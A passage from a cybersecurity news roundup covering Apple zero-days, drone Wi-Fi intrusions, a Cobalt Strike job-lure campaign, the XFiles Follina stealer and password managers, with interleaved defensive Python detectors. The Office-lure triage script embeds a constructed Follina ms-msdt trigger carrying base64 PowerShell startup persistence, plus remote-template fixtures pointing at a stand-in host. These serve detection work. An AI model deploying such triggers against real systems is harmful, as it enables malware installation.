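        print(f"len {n}: keyspace={keyspace(n):.3e} list covers at most {wordlist_fraction(n):.2e}")
```

With the constructed input the SSH service shows one miss that is the honeypot's own address and the RDP service shows one miss that is the AuToLoG string, mirroring the two anomalies in the report; the keyspace functions show why a 12- or 20-character random password is out of reach of any wordlist.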

Tod Beardsley, Rapid7's director of research, notes that these automated attacks are cheap to run. That they keep paying off shows that password managers are still not the default way of generating and storing passwords, and that needs to change. One significant drawback stands in the way: password managers are not always intuitive or easy to use.

Web3: Cybercrime May Come to an End, Here’s How

 

Cybercrime has surged in the U.S., causing trillions of dollars' worth of damage annually. One of the top threats is digital identity theft, in which threat actors use victims' stolen personal information to wreak financial havoc. 
The problem has persisted for years and is not going away any time soon. Commenting on it, the CEO of Sony said: “the solution to cybercrime isn’t two-factor identification or your mother’s maiden name. The solution to cybercrime lies in the transition to Web3.” 

What is Web3?  


Web3, also known as Web 3.0, is the iteration of the internet that succeeds Web 2.0. Web 2.0 is a centralized model in which most data, content and services are controlled by a handful of internet giants, often referred to as ‘Big Tech.’ 

Web3, on the other hand, is a decentralised version of the internet that lets users interact with one another in a secure, peer-to-peer environment.  

How are users vulnerable in Web2? 

A “digital identity” in Web2 is more than a username and a profile picture: to create one, a user has to supply a verifiable email address.  

There is, of course, no limit to how many email addresses one user can create, and most people have several, serving different purposes such as personal use, work communication and spam filtering. 

Beyond two-factor authentication, there is no way to confirm that the person logging in is who they claim to be, so anyone holding the credentials can get into any of these accounts.  

Adding to the problem, once a company holds a user’s personal data, the user has practically no control over it. Personal information is sold on for targeted advertising, and every additional party with access, and every secondary sale, gives a threat actor another opportunity to obtain and exploit it. 


How is Web3 solving the problem?  


Login security: users would no longer depend on centralized authorities. Logging in would be as simple as a biometric unlock, backed by decentralized identifiers (DIDs) and blockchain-based verification.  

Bots constantly scour the internet for stray credentials they can use to get into bank accounts, email and other services. Consolidated digital identities accessed by biometric login would stop this in its tracks.  

Control and Monetization of User Data


With a consolidated digital identity, users can use their data as they see fit, because they control who sees it and who has to pay for it. For instance, one could build a decentralised ad network on Web3 and let users opt in or out of it.  

Although Web3’s growing popularity has it billed as the ‘next big revolution’ in digital technology, for its promise of making life easier for the unbanked and others, it still needs a great deal of work on the loopholes and potential vulnerabilities that could cause serious problems in the future.

OpenAI : Students are Using AI Tools to Write Paper for Them

 

University students are acing their assignments with the help of advanced language generators and AI language tools such as the OpenAI Playground. 
 
According to Motherboard, these tools let students write their papers effortlessly, as it is hard to tell that an AI-produced response was ‘not’ written by the student. Since the output is not caught by plagiarism software either, schools and universities may find this next-generation cheating difficult to counter. 
 
In an interview with Motherboard, a student who goes by the Reddit username innovative_rye says "It would be simple assignments that included extended responses." 
 
"For biology, we would learn about biotech and write five good and bad things about biotech. I would send a prompt to the AI like, 'what are five good and bad things about biotech?' and it would generate an answer that would get me an A," he added. 
 
innovative_rye also describes how AI tools let him focus on what he thinks is important: "I still do my homework on things I need to learn to pass, I just use AI to handle the things I don't want to do or find meaningless." Whether AI-generated writing should ever count as original work is still debated, but since it goes undetected by plagiarism software, students treat these AI-generated responses as their own work.  
 
If plagiarism software could detect AI-generated writing, this would not be a problem. Whether, and when, detection software will catch up with AI remains an open question.  
 
"[The text] is not copied from somewhere else, it's produced by a machine, so plagiarism checking software is not going to be able to detect it and it's not able to pick it up because the text wasn't copied from anywhere else," says George Veletsianos, Canada Research Chair in Innovative Learning & Technology and associate professor at Royal Roads University. 
 
"Without knowing how all these other plagiarism checking tools quite work and how they might be developed in the future, [...] I don't think that AI text can be detectable in that way," he continued. 
 
While this is a real concern for teachers, since these students are plainly cheating on their papers, the AI tools also raise the question of whether learning is moving forward for this generation at all.

A Constant Battle Between Apple and Zero-Day Security Vulnerabilities

 


Recently there has been a marked rise in attackers targeting Apple with zero-day exploits. Zero-days are prized because they can be the most valuable asset in an attacker's portfolio. So far in 2022 Apple has disclosed seven zero-day vulnerabilities in its products and followed each with an update to address it. Even so, there seems to be no end in sight to this classic cat-and-mouse game.

In 2021, more than twice as many in-the-wild zero-days were recorded as in 2020, the highest level since tracking began in 2014, as shown by the repository maintained by Google's Project Zero. 

As the MIT Technology Review describes it, the increase in hacking over the past few years is attributed to the rapid global proliferation of hacking tools and the willingness of powerful state and non-state groups to invest heavily in finding and exploiting flaws in these operating systems. Threat actors actively hunt for vulnerabilities and sell what they find to the highest bidder.

Apple has been compromised repeatedly by these attackers. Apple, one of the four dominant IT companies in the world, entered 2022 with two zero-day bugs in its operating systems, including a WebKit flaw that could have exposed users' browsing data, after closing out 2021 with 12 recorded exploits and remediations. 

The company released 23 security patches less than a month after discovering these issues. One newly discovered flaw could be exploited to compromise a user's device when it loaded a malicious website.

Fast forward to August 17 of this year, when Apple disclosed two more vulnerabilities in its operating systems, CVE-2022-32893 and CVE-2022-32894. The first is a remote code execution (RCE) flaw in WebKit, the browser engine behind Safari and behind every browser on iOS. The second is an out-of-bounds write in the kernel that lets an attacker execute arbitrary code with kernel privileges, effectively giving full control of the device's software and hardware. 

The two vulnerabilities affect a wide range of Apple devices: the iPhone 6s and later, all iPad Pro models, the iPad Air 2 and later, the iPad 5th generation and later, the iPad mini 4 and later, the iPod touch (7th generation) and Macs running macOS Monterey. Apple's updates address vulnerabilities it says may have been “actively exploited.”

A report by Digital Shadows' research team found that zero-day exploits sell for as much as $10 million, making them the most expensive commodity in a wide array of cybercrime offerings. The report adds that this market is bound to expand and fuel further cyber threats.
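The check that follows from an advisory like this, as an added Python example (not Apple's code and not from the article): compare a device inventory against the builds that shipped the fixes for CVE-2022-32893 and CVE-2022-32894, which according to Apple's August 17, 2022 advisories are iOS 15.6.1, iPadOS 15.6.1 and macOS Monterey 12.5.1. The inventory records are constructed; a real one would come from an MDM export, and the hostnames and OS labels are assumptions.

```python
"""Flag Apple devices still below the builds that fixed CVE-2022-32893/32894.
Added example; patched builds are from Apple's August 17, 2022 advisories,
the device inventory is constructed."""
import platform

PATCHED = {               # minimum build carrying both fixes
    "iOS": "15.6.1",
    "iPadOS": "15.6.1",
    "macOS": "12.5.1",    # Monterey; earlier macOS majors were not listed by Apple
}


def parse_version(text):
    """'12.5' -> (12, 5, 0): pad to three numeric components so '12.5' < '12.5.1'."""
    parts = [int(p) for p in text.strip().split(".") if p.isdigit()]
    if not parts:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(parts + [0] * (3 - len(parts)))[:3]


def is_patched(os_name, version, patched=PATCHED):
    """True when version >= the patched build for that OS; None for an OS the
    advisory does not cover, so callers can tell 'unknown' from 'vulnerable'."""
    if os_name not in patched:
        return None
    return parse_version(version) >= parse_version(patched[os_name])


def unpatched_devices(inventory, patched=PATCHED):
    """[(hostname, os, version)] for devices below the fixed build."""
    return [(h, o, v) for h, o, v in inventory if is_patched(o, v, patched) is False]


def this_host_status():
    """Check the machine running the script; only meaningful on macOS."""
    ver = platform.mac_ver()[0]
    return is_patched("macOS", ver) if ver else None


# Constructed inventory: (hostname, os, version)
INVENTORY = [
    ("mbp-finance-01", "macOS", "12.5.1"),
    ("mbp-finance-02", "macOS", "12.5"),
    ("iphone-ceo", "iOS", "15.6.1"),
    ("iphone-sales-07", "iOS", "15.6"),
    ("ipad-lobby", "iPadOS", "16.0"),
    ("appletv-boardroom", "tvOS", "15.6"),   # not covered by the advisory
]

if __name__ == "__main__":
    for h, o, v in unpatched_devices(INVENTORY):
        print(f"UPDATE REQUIRED: {h} {o} {v} < {PATCHED[o]}")
    print("this host:", this_host_status())
```

Devices running an OS the advisory does not mention come back as None rather than False, so they are reported as unknown instead of being silently treated as safe.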

Five Suspects Charged for $2.5 million Worth NFTs Theft, Targeting Bored Ape NFT Owners

 

On Wednesday, October 12, five suspects in France were charged in connection with a phishing scam. They allegedly stole and resold $2.5 million worth of blue-chip non-fungible tokens (NFTs), targeting owners of Bored Ape Yacht Club (BAYC) and Mutant Ape Yacht Club (MAYC) NFTs. 
 
According to the prosecution, the suspects stole the assets by luring victims to a fake website that promised to animate their NFTs, Agence France-Presse (AFP) reports in a piece carried by Barron's. 
 
The suspects, aged between 18 and 24, live in Paris, Caen and Tours. Two of them are charged with building the fraudulent phishing site that enabled the theft; the other three are accused of handling the advertising and money-laundering sides of the operation, said Christopher Durand, deputy chief of France’s cyber-crime authority. 
 
The charges include “fraud committed as a part of criminal gang, concealing fraud and criminal association.” The suspects have been placed in pre-trial detention. The parents of one of the accused were also arrested but later released without charge. 
 
Durand says the probe began with an investigation by the well-known Twitter user “ZachXBT”. ZachXBT, who describes himself as an “on-chain sleuth”, wrote in a blog post that the Twitter user “Dilly Dilly” had clicked on a link shared by “a verified member of the BAYC Discord” and had his BAYC NFT stolen after approving a transaction on a website that “he was led to believe would produce an animated version” of his NFT.  
 
ZachXBT says that after selling the stolen tokens on the NFT marketplace OpenSea, the accused tried to cover their tracks using the now-sanctioned Tornado Cash mixer. 
 
A report by blockchain analytics firm Elliptic estimates that over $100 million worth of NFTs were stolen between July 2021 and July 2022. Taken together with these latest incidents, NFT fraud appears to be booming, which has raised security concerns.  
 
The news comes as Yuga Labs, the firm behind the Bored Ape collection, is under investigation for its business practices. Although the company has not been charged with any wrongdoing, the Securities and Exchange Commission (SEC) is probing the start-up, according to anonymous sources cited by Bloomberg.

Cyber-Spy Exploits are Being Dropped by Drones


Drones carrying cyber-spying gear used to be a topic for abstract academic discussion among security enthusiasts. They are now being used in the real world to break into networks and steal information. 

On October 10, cybersecurity researcher Greg Linares published a Twitter thread providing a brief overview of a drone-based cyberattack he had recently witnessed while working as a freelance researcher.  

According to Linares, the incident began when an unnamed financial company picked up unusual traffic on its internal network. Tracing the Wi-Fi signal led the company's team to the roof, where they found two drones, and to further suspicious activity on the network. 
 
Linares described one of the drones as a modified DJI Phantom carrying what he called a "modified Wifi Pineapple device", and the other as a similarly modified DJI Matrice 600 carrying "a Raspberry Pi, batteries, GPD mini laptop, a 4G modem, and another Wi-Fi device." 

Linares explained that the attackers used this access to reach the company's internal Atlassian Confluence page and the devices connected to it, with the aim of stealing credentials and other information. During their investigation the threat hunters found that one of the drones had been damaged but was still functional. 

"In light of the limited success of this attack, it appears that once the attackers were detected, they crashed the drone as they were recovering it from the ground," Linares claimed on Twitter.

He further estimated that an attack of this kind could probably be assembled for no more than $15,000, though he did not give an exact figure. 

As he warned, attackers are prepared to spend that much on hardware they do not mind losing. "This is the third real-world attack I have encountered from a drone in the last two years," he added. 
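A defensive counterpart to the hardware Linares describes, added here as an example and not taken from his thread or from any vendor: a Wi-Fi Pineapple impersonates legitimate networks, so a site survey can be compared against the inventory of managed access points. The corporate SSID, the AP inventory and the scan results below are constructed. The two heuristics are the corporate SSID advertised by a BSSID that is not in inventory (or with the wrong security type), and a single radio, recognised by a shared MAC prefix, the same channel and near-identical signal, advertising several unrelated SSIDs, which is how a Pineapple answering arbitrary probe requests looks from the ground.

```python
"""Rogue access point triage from a Wi-Fi scan. Added example; the SSID,
the AP inventory and the scan records are constructed."""
from collections import defaultdict
from dataclasses import dataclass

CORP_SSID = "CORP-WIFI"                      # assumed corporate network name
MANAGED_AUTH = "WPA2-Enterprise"             # assumed security type on managed APs
MANAGED_BSSIDS = {                           # constructed inventory of managed radios
    "aa:bb:cc:00:01:10", "aa:bb:cc:00:01:11", "aa:bb:cc:00:01:12",
}


@dataclass(frozen=True)
class ScanEntry:
    ssid: str
    bssid: str
    channel: int
    signal_dbm: int
    auth: str


# Constructed scan, as a site survey tool would report it.
SCAN = [
    ScanEntry("CORP-WIFI", "aa:bb:cc:00:01:10", 36, -52, "WPA2-Enterprise"),
    ScanEntry("CORP-WIFI", "aa:bb:cc:00:01:11", 44, -61, "WPA2-Enterprise"),
    ScanEntry("CORP-GUEST", "aa:bb:cc:00:01:12", 1, -70, "Open"),
    ScanEntry("CORP-WIFI", "de:ad:be:ef:00:01", 6, -38, "Open"),             # evil twin
    ScanEntry("xfinitywifi", "de:ad:be:ef:00:02", 6, -40, "Open"),           # same radio
    ScanEntry("Starbucks WiFi", "de:ad:be:ef:00:03", 6, -39, "Open"),        # same radio
    ScanEntry("NETGEAR42", "11:22:33:44:55:66", 11, -80, "WPA2-Personal"),   # neighbour
]


def evil_twins(scan, ssid=CORP_SSID, managed=MANAGED_BSSIDS, auth=MANAGED_AUTH):
    """Entries advertising our SSID from an unmanaged radio or with the wrong auth."""
    findings = []
    for e in scan:
        if e.ssid != ssid:
            continue
        reasons = []
        if e.bssid.lower() not in managed:
            reasons.append("bssid not in inventory")
        if e.auth != auth:
            reasons.append(f"auth {e.auth} != {auth}")
        if reasons:
            findings.append((e.bssid, reasons))
    return findings


def radio_key(e):
    """Group by the first five MAC octets and the channel: one radio serving
    several virtual BSSIDs typically differs only in the last octet."""
    return (e.bssid.lower()[:14], e.channel)


def karma_radios(scan, managed=MANAGED_BSSIDS, min_ssids=3, max_signal_spread=6):
    """Unmanaged radios broadcasting >= min_ssids different SSIDs at near-identical
    signal strength: the signature of a Pineapple answering probe requests."""
    groups = defaultdict(list)
    for e in scan:
        if e.bssid.lower() not in managed:
            groups[radio_key(e)].append(e)
    suspects = []
    for (prefix, channel), entries in groups.items():
        ssids = {e.ssid for e in entries}
        spread = max(e.signal_dbm for e in entries) - min(e.signal_dbm for e in entries)
        if len(ssids) >= min_ssids and spread <= max_signal_spread:
            suspects.append((prefix, channel, sorted(ssids)))
    return suspects


if __name__ == "__main__":
    print("evil twins:", evil_twins(SCAN))
    print("karma radios:", karma_radios(SCAN))
```

The second heuristic is what catches a Pineapple even when it is not yet spoofing the corporate SSID: a legitimate neighbour broadcasts one or two networks from one radio, not a random sample of every SSID nearby clients have ever joined.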

Malware Campaign Targets Job Seekers With Cobalt Strike Beacons

 
A social engineering campaign is exploiting a years-old remote code execution vulnerability in Microsoft Office to deploy Cobalt Strike beacons and target job seekers. 

According to a report published on Wednesday by Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer, the payload discovered appears to be a leaked version of a Cobalt Strike beacon.

The beacon's configuration contains commands for targeted injection of arbitrary binaries into running processes, and it has a high-reputation domain configured, a redirector technique used to disguise the beacon's command-and-control traffic.

The malicious activity, observed in August 2022, attempts to exploit CVE-2017-0199, a remote code execution vulnerability in Microsoft Office that allows an attacker to take control of an affected system.

The entry vector is a phishing email purporting to come from the Public Service Association, a New Zealand trade union, carrying a Microsoft Word attachment with job lures for positions in the U.S. government and at the union itself. The Cobalt Strike beacons are far from the only payloads: Talos has also observed Redline Stealer and Amadey botnet executables being delivered at the end of the attack chain.

The researchers note that the attack is highly modular, with Bitbucket repositories used to host the malicious content. In one chain, the exploit document downloads an executable that installs the Cobalt Strike beacon DLL on the victim's machine.

A second chain uses obfuscated VB and PowerShell downloader scripts stored in one repository to retrieve the beacon, which is hosted in a different Bitbucket account.

"This campaign is a well-known example of how a threat actor employs a technique of generating and executing a malicious script in the system memory of the victim as a means of attacking the system," the researchers said.

"Organizations should be constantly vigilant on the Cobalt Strike beacons and should implement layered defense capabilities to thwart the attacker's attempts at the earliest stage in the infection chain so as to thwart the attack's progress."

DIHK Suffers Cyberattacks, Shuts Down IT Systems


About the DIHK Attack

The Association of German Chambers of Industry and Commerce (DIHK) has been forced to shut down all of its IT systems, including digital services, telephones and e-mail servers, as a countermeasure against a cyberattack. 

DIHK is an association of 79 chambers representing businesses across Germany, with more than 3 million members ranging from small shops to large enterprises. 

The association handles legal representation, foreign trade promotion, consultation, regional economic development and training, and offers general support services to its members. 


How did attackers breach DIHK?

A statement on the DIHK website describes the shutdown as a precautionary measure intended to give IT teams time to investigate and put countermeasures in place. 

A few services are gradually becoming available again after thorough reviews to make sure they are safe to use, but restoration is not yet complete. 

DIHK general manager Michael Bergmann informed the public of the cyberattack, which took place on Wednesday, in a LinkedIn post, describing the incident as 'massive.' DIHK cannot currently say how long the emergency shutdown will need to remain in place. 

The attack bears the hallmarks of ransomware, with systems shut down to stop malware from spreading further, but this has not been officially confirmed. 

No ransomware group has so far claimed a successful compromise of DIHK on its leak site, though it is too early to read anything into that. The attack's impact is not confined to one region. 

BleepingComputer reports: "individual divisions in North Rhine-Westphalia, Lower Saxony, Bavaria, and Mecklenburg-Western Pomerania have all confirmed facing problems. For example, the Chamber of Industry and Commerce in Köln informed the public that phone lines work to a limited extent, while its website was still offline at the time of this writing."

XFiles Malware Exploits Follina, Expands Its Attacks

What is XFiles?

The XFiles info-stealer has added an exploit for CVE-2022-30190, known as Follina, to its arsenal and uses it to drop malicious payloads on targeted systems. Researchers at Cyberint found that recent campaigns use Follina to download the payload, execute it and take hold of the target machine. "In the case of the XFiles malware, researchers at Cyberint noticed that recent campaigns delivering the malware use Follina to download the payload, execute it, and also create persistence on the target machine," says BleepingComputer.  

How does the Follina infection chain work? 

•The lure document, delivered by spam email, contains an OLE object pointing to an HTML file on an external server; the JavaScript in that file triggers Follina. 

•Once executed, the code retrieves a base64-encoded string of PowerShell commands that establish persistence in the Windows Startup directory and deploy the malware. 

•The second-stage module, "ChimLacUpdate.exe," contains an AES decryption key and hard-coded encrypted shellcode, which it decrypts and runs inside its own process via an API call. 

•Once installed, XFiles carries out typical info-stealer activity: harvesting passwords, browsing history and cookies from web browsers, taking screenshots, targeting cryptocurrency wallets, and looking for Telegram and Discord credentials. 

•The stolen files are staged in newly created local directories before being exfiltrated via Telegram. 
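Both this infection chain and the Cobalt Strike job-lure campaign described earlier start with an Office document whose OOXML relationships point outside the package: a remote template or linked OLE object for CVE-2017-0199, and an OLE object pointing at an HTML file that invokes the ms-msdt: handler for Follina (CVE-2022-30190). The following Python is an added example, not Cyberint's, Talos's or any code from the articles, of a static triage check that covers both: it lists every external relationship in a .docx, flags the relationship types that make Word fetch and act on remote content, and decodes any base64 blob inside an ms-msdt: URI taken from the downloaded HTML. The three in-memory documents, the HTML page, the lure filenames and the persistence command are constructed (example.invalid is a reserved, non-routable name); the set of relationship types treated as fetch-and-execute is my choice, not an official list.

```python
"""Static triage for Office lures that pull remote content: template injection /
OLE links (CVE-2017-0199) and Follina (CVE-2022-30190). Added example; every
document and page below is constructed."""
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
FETCH_AND_EXECUTE = {"attachedTemplate", "oleObject", "frame"}  # Word loads these itself
REMOTE_SCHEMES = ("http://", "https://", "\\\\")                # URL or UNC path

def external_relationships(docx_bytes):
    """(rels part, relationship type, target) for every TargetMode="External" entry."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rtype, rel.get("Target", "")))
    return hits

def suspicious_external_links(docx_bytes):
    """External fetch-and-execute relationships with a remote target. Plain
    hyperlinks and file:// template paths (a local Normal.dotm) are not flagged."""
    return [h for h in external_relationships(docx_bytes)
            if h[1] in FETCH_AND_EXECUTE and h[2].lower().startswith(REMOTE_SCHEMES)]

# Follina: the fetched HTML sets location to an ms-msdt: URI. The URI contains
# spaces and escaped quotes, so read up to the JS string terminator instead.
MSDT_RE = re.compile(r'ms-msdt:.*?(?=";|</script>|$)', re.IGNORECASE | re.DOTALL)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def msdt_uris(html_text):
    """ms-msdt: URIs in the fetched HTML, the Follina trigger."""
    return MSDT_RE.findall(html_text)

def decoded_payloads(html_text):
    """Base64 blobs inside ms-msdt: URIs that decode to printable text; Follina
    lures carry their PowerShell this way."""
    out = []
    for uri in msdt_uris(html_text):
        for blob in B64_RE.findall(uri):
            try:
                text = base64.b64decode(blob, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if text.isprintable():
                out.append(text)
    return out

# ---- constructed samples ------------------------------------------------------
REL = ('<Relationship Id="{id}" Type="http://schemas.openxmlformats.org/officeDocument/'
       '2006/relationships/{type}" Target="{target}" TargetMode="External"/>')

def build_docx(document_rels="", settings_rels=""):
    """Minimal .docx skeleton carrying only the two .rels parts that matter here."""
    wrap = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships '
            'xmlns="http://schemas.openxmlformats.org/package/2006/relationships">{}'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", wrap.format(document_rels))
        zf.writestr("word/_rels/settings.xml.rels", wrap.format(settings_rels))
    return buf.getvalue()

BENIGN_DOCX = build_docx(
    REL.format(id="rId1", type="hyperlink", target="https://example.invalid/"),
    REL.format(id="rId1", type="attachedTemplate", target="file:///C:/Users/u/Normal.dotm"))
FOLLINA_DOCX = build_docx(
    REL.format(id="rId5", type="oleObject", target="http://example.invalid/lure.html!"))
TEMPLATE_INJECTION_DOCX = build_docx(
    settings_rels=REL.format(id="rId1", type="attachedTemplate",
                             target="https://example.invalid/downloads/jobs.dotm"))

# Stand-in for the HTML the OLE object fetches; the command is made up, not a real sample.
PERSIST_CMD = "Copy-Item x.exe $env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
FAKE_B64 = base64.b64encode(PERSIST_CMD.encode()).decode()
FOLLINA_HTML = (
    '<script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_BrowseForFile=$(Invoke-Expression([Text.Encoding]::UTF8'
    f".GetString([Convert]::FromBase64String('{FAKE_B64}'))))i/../../Windows/System32/"
    'mpsigstub.exe\\"";</script>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOCX), ("follina", FOLLINA_DOCX),
                       ("template injection", TEMPLATE_INJECTION_DOCX)):
        print(label, "->", suspicious_external_links(doc))
    print("payload:", decoded_payloads(FOLLINA_HTML))
```

The benign document carries an external hyperlink and a local template path and is not flagged; the Follina and template-injection documents each produce one finding, and the ms-msdt: decoder recovers the embedded command without executing anything. A mail gateway or sandbox pre-filter can run the first two functions on every Office attachment before it reaches a user.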

XFiles is becoming more active 

• Cyberint also reports that the XFiles group has expanded, taking in new members and launching new projects. 

• One project launched earlier this year by XFiles is called 'Punisher Miner.' 

• Ironically, the new mining tool is priced at $9, the same as a month's rental of the XFiles info-stealer. 

CyWare Social says "it appears that the XFiles gang is expanding and becoming more prolific. The gang is recruiting talented malware authors, becoming stronger, and thus providing their users with more readymade tools that do not require experience or coding knowledge. Successful incorporation of the Follina-exploiting document increases the chances of infection and consequently increases the success rate of attacks."

US Eye Clinic Suffers Data Breach, 92,000 Patients Hit

 

Mattax Neu Prater Eye Center, an eye clinic in Missouri, disclosed at the end of June that it had suffered a data breach, although the attack itself took place in December 2021. The center has informed U.S. regulators that more than 92,000 individuals are affected.

“This incident has affected eye care practices across the country, and is not specific to Mattax Neu Prater. This data security incident occurred entirely within Eye Care Leaders’ network environment, and there were no other remedial actions available to Mattax Neu Prater,” the center said. 

Mattax Neu Prater Eye Center is a provider of advanced laser vision correction such as LASIK, cataract surgery and advanced-technology replacement lenses in Springfield, Missouri. It offers surgical and non-surgical care, and it has reported that the “third-party data security incident” may have compromised sensitive patient data. 

“However, a lack of available forensic evidence prevented Eye Care Leaders from ruling out the possibility that some protected health information and personally identifiable information may have been exposed to the bad actor,” the clinic added. 

Mattax Neu Prater added that it currently has no evidence of identity theft resulting from the incident, but it has notified potentially affected patients by postal mail. 

Cybersecurity experts recommend that all healthcare organizations adopt a zero-trust approach to their digital systems, treating every connected device as a potential intruder until it has been properly verified. In their view, traditional approaches that rely on firewalls and antivirus software alone have become less effective. 

Some researchers also argue that the best protection is to do away with passwords altogether. Other recommendations for healthcare professionals include:

• Store patient data on systems that are not connected to the internet. 
• Train staff on phishing attacks and how they work. 
• Use two-factor or multi-factor authentication (including biometrics) for logins instead of passwords.
• Never click links in email or download attachments. 
• Encrypt all data, so that if it is accessed or compromised it is not exposed.

Google Announces Password Manager Updates to Enhance User Security

 

Last week, Google announced updates to its Password Manager aimed at users who struggle to keep track of their passwords. 

Chrome users can now use Google Password Manager's autofill to have the browser remember and fill passwords for every site they visit, the company said in a blog post. 

Previously, users could add passwords to Google Password Manager only when Google prompted them to; now they can add passwords manually at any time. 

Although Google is not yet ready to make Password Manager a standalone app, Android users can now add a shortcut to it on the home screen, and iPhone users who set Chrome as their default autofill provider can generate unique, strong passwords for their apps. 

The built-in Password Checkup feature on Android is also getting an upgrade: beyond checking for compromised credentials, it will flag weak and reused passwords, much as Apple's iOS does. Google is also rolling out compromised-password warnings to Chrome users on all operating systems. 

Finally, Google is launching "Touch-to-Login" in Chrome on Android, which lets users sign in to a website with a single tap once autofill has supplied the credentials. Apple introduced a similar feature in Safari with iOS 12.2. 

According to Google's blog post, the updates were designed at the Google Safety Engineering Center, where privacy and security experts work on building a secure ecosystem for users. 

The blogpost further stated, “Of course, our efforts to create a safer web are a truly global effort – from our early work on 2-step verification to our future investments in technologies like passkeys – and these updates that we are rolling out over the next months are an important part of that work.” 

The announcement comes after Verizon’s 2022 Data Breach Investigations Report highlighted that compromised credentials accounted for almost 50% of data breaches.
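What a password checkup of the kind described above has to do, as an added Python example: this is not Google's code, and it does not reproduce Google's protocol (Google's check against breached credentials uses a privacy-preserving scheme that is not shown here). It audits a small constructed vault for reused and weak passwords and then checks each one against a constructed breach corpus using hash-prefix bucketing, the k-anonymity layout some public breach-lookup services use, so that only a short prefix of the hash, never the password, would leave the client. The vault entries, the breach corpus and the weak-password list are constructed.

```python
"""Local password checkup: reuse, weakness and breach exposure via hash-prefix
bucketing. Added example; vault, breach corpus and common-password list are constructed."""
import hashlib
from collections import defaultdict

# Constructed vault: (site, username, password)
VAULT = [
    ("mail.example", "alice", "Tr0ub4dor&3"),
    ("bank.example", "alice", "Tr0ub4dor&3"),          # reused
    ("shop.example", "alice", "summer2022"),           # weak and breached
    ("forum.example", "alice", "correct horse battery staple xK9#"),
    ("vpn.example", "alice", "password"),              # in the common list
]
COMMON_PASSWORDS = {"password", "123456", "qwerty", "summer2022"}  # constructed


def sha1_hex(password):
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


# Constructed breach corpus indexed by the first 5 hex chars of SHA-1, the
# k-anonymity layout used by some public services (not Google's protocol).
BREACHED = ["summer2022", "password", "letmein", "hunter2"]
BREACH_INDEX = defaultdict(set)
for _pw in BREACHED:
    _h = sha1_hex(_pw)
    BREACH_INDEX[_h[:5]].add(_h[5:])


def reused_passwords(vault):
    """{password: [sites]} for passwords used on more than one site."""
    by_pw = defaultdict(list)
    for site, _user, pw in vault:
        by_pw[pw].append(site)
    return {pw: sites for pw, sites in by_pw.items() if len(sites) > 1}


def weak_reasons(password, common=COMMON_PASSWORDS, min_len=12):
    """Why a password is weak: too short, too few character classes, or common."""
    reasons = []
    if len(password) < min_len:
        reasons.append(f"shorter than {min_len}")
    checks = (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum())
    classes = sum(any(check(c) for c in password) for check in checks)
    if classes < 3:
        reasons.append("fewer than 3 character classes")
    if password.lower() in common:
        reasons.append("common password")
    return reasons


def breach_query(password):
    """Split the hash: the 5-char prefix is what a client would send, the suffix
    is matched locally against the bucket that comes back."""
    h = sha1_hex(password)
    return h[:5], h[5:]


def is_breached(password, index=BREACH_INDEX):
    prefix, suffix = breach_query(password)
    return suffix in index.get(prefix, set())   # bucket lookup; password never sent


def checkup(vault):
    """Per-site findings, like a password manager's checkup screen."""
    reused = reused_passwords(vault)
    report = {}
    for site, _user, pw in vault:
        issues = list(weak_reasons(pw))
        if pw in reused:
            issues.append("reused on " + ", ".join(s for s in reused[pw] if s != site))
        if is_breached(pw):
            issues.append("appears in breach corpus")
        report[site] = issues
    return report


if __name__ == "__main__":
    for site, issues in checkup(VAULT).items():
        print(site, "->", issues or ["ok"])
```

The long passphrase comes back clean, the reused password is reported on both sites that share it, and the two common passwords are caught both by the local rules and by the breach lookup, which is the combination of signals the checkup feature described above surfaces to the user.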